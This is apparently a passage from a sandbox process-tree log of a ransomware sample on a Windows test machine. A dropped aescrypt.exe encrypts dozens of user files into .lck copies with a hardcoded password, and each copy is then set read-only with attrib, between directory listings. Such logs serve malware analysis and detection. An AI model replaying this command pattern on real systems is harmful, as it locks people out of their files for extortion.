"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RepairImport.pot.lck" "RepairImport.pot"
3⤵
- Executes dropped EXE
PID:3432

C:\Windows\system32\attrib.exe
attrib +r "RepairImport.pot.lck"
3⤵
PID:3880

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnprotectLimit.mhtml.lck" "UnprotectLimit.mhtml"
3⤵
- Executes dropped EXE
PID:4476

C:\Windows\system32\attrib.exe
attrib +r "UnprotectLimit.mhtml.lck"
3⤵
- Views/modifies file attributes
PID:1960

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConvertFromInitialize.vssm.lck" "ConvertFromInitialize.vssm"
3⤵
- Executes dropped EXE
PID:4076

C:\Windows\system32\attrib.exe
attrib +r "ConvertFromInitialize.vssm.lck"
3⤵
PID:3108

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "NewDeny.vdx.lck" "NewDeny.vdx"
3⤵
- Executes dropped EXE
PID:3488

C:\Windows\system32\attrib.exe
attrib +r "NewDeny.vdx.lck"
3⤵
PID:4432

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SubmitSave.xps.lck" "SubmitSave.xps"
3⤵
- Executes dropped EXE
PID:4464

C:\Windows\system32\attrib.exe
attrib +r "SubmitSave.xps.lck"
3⤵
- Views/modifies file attributes
PID:4524

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnblockRestart.xltx.lck" "UnblockRestart.xltx"
3⤵
- Executes dropped EXE
PID:4620

C:\Windows\system32\attrib.exe
attrib +r "UnblockRestart.xltx.lck"
3⤵
- Views/modifies file attributes
PID:4536

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "StepRemove.doc.lck" "StepRemove.doc"
3⤵
- Executes dropped EXE
PID:3196

C:\Windows\system32\attrib.exe
attrib +r "StepRemove.doc.lck"
3⤵
- Views/modifies file attributes
PID:532

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "WaitPush.pptm.lck" "WaitPush.pptm"
3⤵
PID:4616

C:\Windows\system32\attrib.exe
attrib +r "WaitPush.pptm.lck"
3⤵
- Views/modifies file attributes
PID:1504

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RestartExport.potx.lck" "RestartExport.potx"
3⤵
PID:1240

C:\Windows\system32\attrib.exe
attrib +r "RestartExport.potx.lck"
3⤵
- Views/modifies file attributes
PID:1280

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "DebugUnlock.pdf.lck" "DebugUnlock.pdf"
3⤵
PID:1392

C:\Windows\system32\attrib.exe
attrib +r "DebugUnlock.pdf.lck"
3⤵
PID:1448

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UpdateRestore.ppsm.lck" "UpdateRestore.ppsm"
3⤵
PID:1104

C:\Windows\system32\attrib.exe
attrib +r "UpdateRestore.ppsm.lck"
3⤵
PID:1784

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "WritePush.ppsx.lck" "WritePush.ppsx"
3⤵
PID:1684

C:\Windows\system32\attrib.exe
attrib +r "WritePush.ppsx.lck"
3⤵
- Views/modifies file attributes
PID:1876

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnpublishSync.doc.lck" "UnpublishSync.doc"
3⤵
PID:1952

C:\Windows\system32\attrib.exe
attrib +r "UnpublishSync.doc.lck"
3⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RestoreLimit.mpp.lck" "RestoreLimit.mpp"
3⤵
PID:2128

C:\Windows\system32\attrib.exe
attrib +r "RestoreLimit.mpp.lck"
3⤵
- Views/modifies file attributes
PID:224

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SwitchUninstall.mpp.lck" "SwitchUninstall.mpp"
3⤵
PID:216

C:\Windows\system32\attrib.exe
attrib +r "SwitchUninstall.mpp.lck"
3⤵
PID:2380

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "GroupGet.xls.lck" "GroupGet.xls"
3⤵
PID:4100

C:\Windows\system32\attrib.exe
attrib +r "GroupGet.xls.lck"
3⤵
PID:4108

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "InstallSwitch.html.lck" "InstallSwitch.html"
3⤵
PID:2568

C:\Windows\system32\attrib.exe
attrib +r "InstallSwitch.html.lck"
3⤵
- Views/modifies file attributes
PID:2564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2576

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:2820

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
PID:2584

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "WaitCheckpoint.mhtml.lck" "WaitCheckpoint.mhtml"
3⤵
PID:4736

C:\Windows\system32\attrib.exe
attrib +r "WaitCheckpoint.mhtml.lck"
3⤵
- Views/modifies file attributes
PID:4712

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConvertToSend.mhtml.lck" "ConvertToSend.mhtml"
3⤵
PID:4740

C:\Windows\system32\attrib.exe
attrib +r "ConvertToSend.mhtml.lck"
3⤵
PID:2572

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "OpenWatch.vsw.lck" "OpenWatch.vsw"
3⤵
PID:200

C:\Windows\system32\attrib.exe
attrib +r "OpenWatch.vsw.lck"
3⤵
- Views/modifies file attributes
PID:968

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "FindInvoke.ppsm.lck" "FindInvoke.ppsm"
3⤵
PID:4624

C:\Windows\system32\attrib.exe
attrib +r "FindInvoke.ppsm.lck"
3⤵
PID:4456

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ClearExpand.tiff.lck" "ClearExpand.tiff"
3⤵
PID:3660

C:\Windows\system32\attrib.exe
attrib +r "ClearExpand.tiff.lck"
3⤵
- Views/modifies file attributes
PID:4756

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnregisterOptimize.vssx.lck" "UnregisterOptimize.vssx"
3⤵
PID:2644

C:\Windows\system32\attrib.exe
attrib +r "UnregisterOptimize.vssx.lck"
3⤵
PID:4808

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RestorePing.xltx.lck" "RestorePing.xltx"
3⤵
PID:4700

C:\Windows\system32\attrib.exe
attrib +r "RestorePing.xltx.lck"
3⤵
PID:1376

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "GetSplit.M2V.lck" "GetSplit.M2V"
3⤵
PID:3104

C:\Windows\system32\attrib.exe
attrib +r "GetSplit.M2V.lck"
3⤵
- Views/modifies file attributes
PID:4352

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UpdateBlock.ps1.lck" "UpdateBlock.ps1"
3⤵
PID:4336

C:\Windows\system32\attrib.exe
attrib +r "UpdateBlock.ps1.lck"
3⤵
PID:4356

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "TraceRead.ocx.lck" "TraceRead.ocx"
3⤵
PID:3012

C:\Windows\system32\attrib.exe
attrib +r "TraceRead.ocx.lck"
3⤵
PID:4596

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "LimitWait.txt.lck" "LimitWait.txt"
3⤵
PID:4856

C:\Windows\system32\attrib.exe
attrib +r "LimitWait.txt.lck"
3⤵
PID:1620

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ResolveMeasure.wdp.lck" "ResolveMeasure.wdp"
3⤵
PID:3612

C:\Windows\system32\attrib.exe
attrib +r "ResolveMeasure.wdp.lck"
3⤵
PID:5112

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SuspendSave.vstm.lck" "SuspendSave.vstm"
3⤵
PID:4184

C:\Windows\system32\attrib.exe
attrib +r "SuspendSave.vstm.lck"
3⤵
PID:3264

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "OutResize.vstx.lck" "OutResize.vstx"
3⤵
PID:284

C:\Windows\system32\attrib.exe
attrib +r "OutResize.vstx.lck"
3⤵
PID:4256

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "CopySuspend.TTS.lck" "CopySuspend.TTS"
3⤵
PID:4272

C:\Windows\system32\attrib.exe
attrib +r "CopySuspend.TTS.lck"
3⤵
- Views/modifies file attributes
PID:4448

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ResizeTest.DVR.lck" "ResizeTest.DVR"
3⤵
PID:4244

C:\Windows\system32\attrib.exe
attrib +r "ResizeTest.DVR.lck"
3⤵
PID:4424

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "GetRequest.mpa.lck" "GetRequest.mpa"
3⤵
PID:4084

C:\Windows\system32\attrib.exe
attrib +r "GetRequest.mpa.lck"
3⤵
PID:3380

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ExportSplit.ram.lck" "ExportSplit.ram"
3⤵
PID:3108

C:\Windows\system32\attrib.exe
attrib +r "ExportSplit.ram.lck"
3⤵
PID:4260

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SplitRestore.wma.lck" "SplitRestore.wma"
3⤵
PID:3900

C:\Windows\system32\attrib.exe
attrib +r "SplitRestore.wma.lck"
3⤵
PID:1692

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConnectRead.xls.lck" "ConnectRead.xls"
3⤵
PID:4496

C:\Windows\system32\attrib.exe
attrib +r "ConnectRead.xls.lck"
3⤵
PID:4552

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "CompressClose.vdx.lck" "CompressClose.vdx"
3⤵
PID:660

C:\Windows\system32\attrib.exe
attrib +r "CompressClose.vdx.lck"
3⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ReadDisconnect.pcx.lck" "ReadDisconnect.pcx"
3⤵
PID:1136

C:\Windows\system32\attrib.exe
attrib +r "ReadDisconnect.pcx.lck"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ExportHide.dwg.lck" "ExportHide.dwg"
3⤵
PID:1096

C:\Windows\system32\attrib.exe
attrib +r "ExportHide.dwg.lck"
3⤵
- Views/modifies file attributes
PID:4844

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "HideComplete.wma.lck" "HideComplete.wma"
3⤵
PID:1448

C:\Windows\system32\attrib.exe
attrib +r "HideComplete.wma.lck"
3⤵
PID:1776

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SplitPing.png.lck" "SplitPing.png"
3⤵
PID:1880

C:\Windows\system32\attrib.exe
attrib +r "SplitPing.png.lck"
3⤵
PID:1876

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "PushProtect.MTS.lck" "PushProtect.MTS"
3⤵
PID:2124

C:\Windows\system32\attrib.exe
attrib +r "PushProtect.MTS.lck"
3⤵
PID:208

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "PushInstall.3gpp.lck" "PushInstall.3gpp"
3⤵
PID:192

C:\Windows\system32\attrib.exe
attrib +r "PushInstall.3gpp.lck"
3⤵
PID:188

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RemoveSplit.jtx.lck" "RemoveSplit.jtx"
3⤵
PID:4104

C:\Windows\system32\attrib.exe
attrib +r "RemoveSplit.jtx.lck"
3⤵
- Views/modifies file attributes
PID:2156

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MeasureStart.wpl.lck" "MeasureStart.wpl"
3⤵
PID:2592

C:\Windows\system32\attrib.exe
attrib +r "MeasureStart.wpl.lck"
3⤵
- Views/modifies file attributes
PID:4724

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ProtectConvertTo.au.lck" "ProtectConvertTo.au"
3⤵
PID:2576

C:\Windows\system32\attrib.exe
attrib +r "ProtectConvertTo.au.lck"
3⤵
- Views/modifies file attributes
PID:2692

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MergePublish.pptm.lck" "MergePublish.pptm"
3⤵
PID:2676

C:\Windows\system32\attrib.exe
attrib +r "MergePublish.pptm.lck"
3⤵
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2864

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Bing.url.lck" "Bing.url"
3⤵
PID:2496

C:\Windows\system32\attrib.exe
attrib +r "Bing.url.lck"
3⤵
PID:1536

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:4368

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
- Views/modifies file attributes
PID:4296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4456

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Desktop.lnk.lck" "Desktop.lnk"
3⤵
PID:752

C:\Windows\system32\attrib.exe
attrib +r "Desktop.lnk.lck"
3⤵
PID:756

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:4880

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
PID:3392

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Downloads.lnk.lck" "Downloads.lnk"
3⤵
PID:1376

C:\Windows\system32\attrib.exe
attrib +r "Downloads.lnk.lck"
3⤵
PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:4332

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
- Views/modifies file attributes
PID:4356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4328

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:4596

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
PID:3336

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SkipClose.nfo.lck" "SkipClose.nfo"
3⤵
PID:296

C:\Windows\system32\attrib.exe
attrib +r "SkipClose.nfo.lck"
3⤵
- Views/modifies file attributes
PID:4848

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "EnterFormat.cfg.lck" "EnterFormat.cfg"
3⤵
PID:4212

C:\Windows\system32\attrib.exe
attrib +r "EnterFormat.cfg.lck"
3⤵
- Views/modifies file attributes
PID:292

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "GetUnregister.otf.lck" "GetUnregister.otf"
3⤵
PID:3264

C:\Windows\system32\attrib.exe
attrib +r "GetUnregister.otf.lck"
3⤵
PID:4048

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SelectResize.svgz.lck" "SelectResize.svgz"
3⤵
PID:4276

C:\Windows\system32\attrib.exe
attrib +r "SelectResize.svgz.lck"
3⤵
- Views/modifies file attributes
PID:3032

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ExpandCheckpoint.doc.lck" "ExpandCheckpoint.doc"
3⤵
PID:380

C:\Windows\system32\attrib.exe
attrib +r "ExpandCheckpoint.doc.lck"
3⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SuspendDeny.cmd.lck" "SuspendDeny.cmd"
3⤵
PID:1664

C:\Windows\system32\attrib.exe
attrib +r "SuspendDeny.cmd.lck"
3⤵
PID:1960

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "CompareDisable.cr2.lck" "CompareDisable.cr2"
3⤵
PID:4436

C:\Windows\system32\attrib.exe
attrib +r "CompareDisable.cr2.lck"
3⤵
PID:4080

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RestartLimit.M2T.lck" "RestartLimit.M2T"
3⤵
PID:4432

C:\Windows\system32\attrib.exe
attrib +r "RestartLimit.M2T.lck"
3⤵
PID:4504

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RevokeUnlock.xlsb.lck" "RevokeUnlock.xlsb"
3⤵
PID:4492

C:\Windows\system32\attrib.exe
attrib +r "RevokeUnlock.xlsb.lck"
3⤵
- Views/modifies file attributes
PID:1692

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConvertApprove.bat.lck" "ConvertApprove.bat"
3⤵
PID:4088

C:\Windows\system32\attrib.exe
attrib +r "ConvertApprove.bat.lck"
3⤵
- Views/modifies file attributes
PID:4544

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MoveCompare.nfo.lck" "MoveCompare.nfo"
3⤵
PID:1260

C:\Windows\system32\attrib.exe
attrib +r "MoveCompare.nfo.lck"
3⤵
PID:1144

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "HideMerge.xla.lck" "HideMerge.xla"
3⤵
PID:1272

C:\Windows\system32\attrib.exe
attrib +r "HideMerge.xla.lck"
3⤵
- Views/modifies file attributes
PID:1404

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MoveOpen.zip.lck" "MoveOpen.zip"
3⤵
PID:4844

C:\Windows\system32\attrib.exe
attrib +r "MoveOpen.zip.lck"
3⤵
- Views/modifies file attributes
PID:1644

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "OutRegister.mpeg3.lck" "OutRegister.mpeg3"
3⤵
PID:1668

C:\Windows\system32\attrib.exe
attrib +r "OutRegister.mpeg3.lck"
3⤵
- Views/modifies file attributes
PID:1820

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "HideSelect.xps.lck" "HideSelect.xps"
3⤵
PID:1828

C:\Windows\system32\attrib.exe
attrib +r "HideSelect.xps.lck"
3⤵
- Views/modifies file attributes
PID:228

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UpdateExit.xla.lck" "UpdateExit.xla"
3⤵
PID:212

C:\Windows\system32\attrib.exe
attrib +r "UpdateExit.xla.lck"
3⤵
PID:188

